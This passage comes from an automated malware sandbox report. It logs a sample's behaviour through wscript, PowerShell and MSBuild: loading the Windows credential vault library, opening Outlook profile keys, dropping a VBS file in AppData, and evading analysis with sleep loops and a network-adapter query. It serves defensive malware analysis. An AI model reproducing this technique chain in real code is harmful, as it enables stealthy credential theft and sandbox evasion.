                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_068BFE30 push es; ret 5_2_068BFE40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_06A04D50 push es; ret 5_2_06A04D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_06A0FAF3 push es; ret 5_2_06A0FAF4

                  Persistence and Installation Behavior

                  barindex
                  Windows Shell Script Host drops VBS files
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\uaDoJtHubxengYS.vbsJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Potential evasive VBS script found (sleep loop)
                  Source: C:\Windows\System32\wscript.exeDropped file: Do While CompteurIterations < 10000 ' Limite d'iterations pour demonstration WScript.Sleep 10000Jump to dropped file
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1560000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4FB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3675Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6069Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1260Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1900Jump to behavior
                  Source: C:\Windows\System32\wscript.exe TID: 5020Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\wscript.exe TID: 5032Thread sleep time: -90000s >= -30000sJump to behavior
